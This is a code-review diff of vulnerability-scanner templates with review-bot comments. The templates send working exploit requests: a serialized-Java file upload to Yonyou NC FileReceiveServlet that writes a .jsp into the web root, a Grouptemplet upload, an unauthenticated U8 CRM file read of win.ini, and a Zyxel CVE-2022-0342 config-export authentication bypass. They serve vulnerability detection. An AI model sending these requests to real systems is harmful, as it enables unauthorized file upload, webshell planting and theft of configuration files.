name: Yonyou NC FileReceiveServlet Aribitrary File Upload
author: bjxsec
severity: high
tags: yonyou,oa,bjxsec,yonyouoa
description: fofa app="用友-UFIDA-NC" "/platform/yonyou-yyy.js"
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}.jsp"
file_content: "{{to_lower(rand_text_alpha(26))}}"
http:
- raw:
- |
POST /servlet/FileReceiveServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: multipart/form-data;
Referer: https://google.com
{{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}t00ls.jsp{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
- |
GET /t00ls.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(body_2, '{{file_content}}')"
- "status_code_1 == 200 && status_code_2 == 200"
condition: and

View File

@ -0,0 +1,41 @@
id: yonyou-nc-filereceiveservlet-fileupload
info:
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
author: bjxsec
severity: critical
description: |
An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
metadata:
max-request: 1
fofa-query: app="用友-UFIDA-NC"
verified: true
tags: yonyou,nc,fileupload,intrusive
variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
file_content: "{{randstr}}"
http:
- raw:
- |
POST /servlet/FileReceiveServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;
{{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
- |
GET /{{file_name}} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2, '{{file_content}}')"
condition: and
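Review bot: `max-request: 1` is wrong; the http block sends two requests (the POST to `/servlet/FileReceiveServlet` and the GET for `/{{file_name}}`), so it should be 2. Add a comment above the hex blobs stating what they decode to (a serialized `java.util.HashMap` with `FILE_NAME` and `TARGET_FILE_PATH` keys pointing at `./webapps/nc_web`, with `file_name` sized to the 9-byte string length encoded in the prefix), so the payload can be reviewed without a hex editor. `Aribitrary` in the name is a typo.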

View File

@ -1,13 +1,19 @@
id: yonyou-nc-grouptemplet-file-upload
id: yonyou-nc-grouptemplet-fileupload
info:
name: yonyou-nc-grouptemplet-file-upload
name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload
author: SleepingBag945
severity: critical
description: 用友NC任意文件上传
description: |
The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files.
reference:
- https://www.seebug.org/vuldb/ssvid-99547
tags: yonyou
- https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
metadata:
max-request: 2
fofa-query: app="用友-UFIDA-NC
verified: true
tags: yonyou,nc,intrusive
variables:
v1: "{{rand_int(1,100)}}"
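Review bot: `fofa-query: app="用友-UFIDA-NC` is missing its closing double quote; YAML accepts it as a plain scalar, but the stored query is wrong for anyone copying it, so it should read `app="用友-UFIDA-NC"` as in the FileReceiveServlet template.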
@ -29,7 +35,7 @@ http:
- |
GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl

File diff suppressed because one or more lines are too long

View File

@ -1,23 +0,0 @@
id: yonyou-u8-crm-getemaildata-file-read
info:
name: 用友U8-CRM getemaildata 任意文件读取
author: SleepingBag945
severity: high
description: |
用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件读取漏洞
metadata:
tags: yonyou
http:
- raw:
- |
POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,"for 16-bit app support")
condition: and

View File

@ -0,0 +1,29 @@
id: yonyou-u8-crm-lfi
info:
name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
author: SleepingBag945
severity: high
description: |
There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: body="用友U8CRM"
verified: true
tags: yonyou,u8-crm,lfi
http:
- raw:
- |
POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")'
condition: and
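Review bot: the probe reads `c:/windows/win.ini` and the DSL matches its `[extensions]` / `[fonts]` sections, so a Linux deployment of this PHP application is reported clean even when `getemaildata.php` is vulnerable; either state in the description that the check covers Windows hosts only, or add a second request for a file that exists on Linux. Splitting the status and body checks into two DSL lines under `condition: and` is fine.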

View File

@ -1,41 +0,0 @@
id: CVE-2022-0342
info:
name: CVE-2022-0342 Zyxel Authentication Bypass
author: SleepingBag945
severity: critical
description: Zyxel USG/ZyWALL是中国合勤科技Zyxel公司的一款防火墙。ZyWALL 4.20版本至4.70版本、USG FLEX 4.50版本至5.20版本、ATP 4.32版本至5.20版本、VPN 4.30版本至5.20版本、NSG 1.20版本至1.33 Patch 4版本存在安全漏洞攻击者利用该漏洞绕过Web身份验证并获得设备的管理访问权限。
tags: zyxel
http:
- raw:
- |
GET /cgi-bin/export-cgi?category=config&arg0=startup-config.conf HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "interface-name"
condition: and
- type: word
words:
- "text/zyxel"
part: header
condition: and
- type: status
status:
- 200
# https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/